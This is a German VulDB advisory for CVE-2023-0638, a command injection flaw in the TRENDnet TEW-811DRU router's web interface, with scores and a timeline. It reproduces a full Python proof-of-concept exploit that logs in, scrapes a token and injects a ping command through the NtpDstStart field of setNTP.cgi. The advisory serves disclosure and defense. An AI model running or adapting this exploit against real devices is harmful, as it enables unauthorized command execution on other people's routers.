TRENDnet TEW-811DRU 1.0.10.0 Web Interface erweiterte Rechte

CVSS Meta Temp ScoreAktueller Exploitpreis (≈)CTI Interest Score
6.5$0-$5k0.04

In TRENDnet TEW-811DRU 1.0.10.0 wurde eine kritische Schwachstelle gefunden. Dabei geht es um ein unbekannter Prozess der Komponente Web Interface. Durch das Manipulieren mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. CWE definiert das Problem als CWE-77. Die genauen Auswirkungen eines erfolgreichen Angriffs sind bisher nicht bekannt.

Die Schwachstelle wurde am 02.02.2023 an die Öffentlichkeit getragen. Eine eindeutige Identifikation der Schwachstelle wird mit CVE-2023-0638 vorgenommen. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. MITRE ATT&CK führt die Angriffstechnik T1202 für diese Schwachstelle.

Ein öffentlicher Exploit wurde in Python realisiert. Der Exploit wird unter vuldb.com bereitgestellt. Er wird als proof-of-concept gehandelt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'

request = {'HEAD': 
{'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Content-Length': '555', 
'Origin': 'http://0.0.0.0:8081', 
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/adm/time.asp', 
'Cookie': 'expandable=5c', 
'Upgrade-Insecure-Requests': '1'}, 
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 
'DSTenable': 'on',
'NtpDstEnable': 1, 
'NtpDstOffset': -7200, 
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 
'tz_daylight_start_day_select': 1, 
'tz_daylight_start_time_select': 2, 
'NtpDstEnd': 100102, 
'tz_daylight_end_month_select': 384968387, 
'tz_daylight_end_day_select': 1, 
'tz_daylight_end_time_select': 2, 
'enableNTP': 1, 
'ntp_server': 1, 
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11', 
'timer_interval': 16776915, 
'manual_year_select': 2012, 
'manual_month_select': 'abcd', 
'manual_day_select': 'abcd', 
'manual_min_select': -38, 
'manual_sec_select': "abcd", 
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../', 
'DNSServerGuest': ''}, 
'ATTR': 
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 
'METHOD': 'POST', 
'VERSION': 'HTTP/1.1'}
}

headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

login_header = {'Host': '0.0.0.0:8081', 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': '*/*', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/login.asp', 
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
  try:
    loop -= 1
    r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
    if r.status_code != 200:
      continue
    r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
    pat = r'name="token" value="(.*?)"'
    token_value = re.findall(pat,r.text)
    if len(token_value)>0:
      params['token'] = token_value[0]
      print('new_token:{}'.format(token_value[0]))
      break
  except Exception as e:
    time.sleep((3-loop)*3)
    print('error:{}'.format(e))


try:
  r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
  pass

Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.

Produktinfo

Hersteller

Name

Version

Lizenz

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv3info

VulDB Meta Base Score: 7.2
VulDB Meta Temp Score: 6.5

VulDB Base Score: 7.2
VulDB Temp Score: 6.5
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VektorKomplexitätAuthentisierungVertraulichkeitIntegritätVerfügbarkeit
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten
freischaltenfreischaltenfreischaltenfreischaltenfreischaltenfreischalten

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍

Exploitinginfo

Klasse: Erweiterte Rechte
CWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202

Lokal: Nein
Remote: Ja

Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Programmiersprache: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍

0-Dayfreischaltenfreischaltenfreischaltenfreischalten
Heutefreischaltenfreischaltenfreischaltenfreischalten

Threat Intelligenceinfo

Interesse: 🔍
Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍

Gegenmassnahmeninfo

Empfehlung: keine Massnahme bekannt
Status: 🔍

0-Day Time: 🔍

Timelineinfo

02.02.2023 🔍
02.02.2023 +0 Tage 🔍
02.02.2023 +0 Tage 🔍
01.03.2023 +27 Tage 🔍

Quelleninfo

Status: Nicht definiert

CVE: CVE-2023-0638 (🔍)
scip Labs: https://www.scip.ch/?labs.20161013

Eintraginfo

Erstellt: 02.02.2023 09:09
Aktualisierung: 01.03.2023 16:39
Anpassungen: 02.02.2023 09:09 (38), 02.02.2023 09:10 (2), 01.03.2023 16:39 (2)
Komplett: 🔍
Einsender: leetsun

Submitinfo

Akzeptiert

  • Submit #76135: Command injection vulnerability in TRENDnet router TEW-811DRU (von leetsun)

Diskussion

Bisher keine Kommentare. Sprachen: de + en.

Bitte loggen Sie sich ein, um kommentieren zu können.

Interested in the pricing of exploits?

See the underground prices here!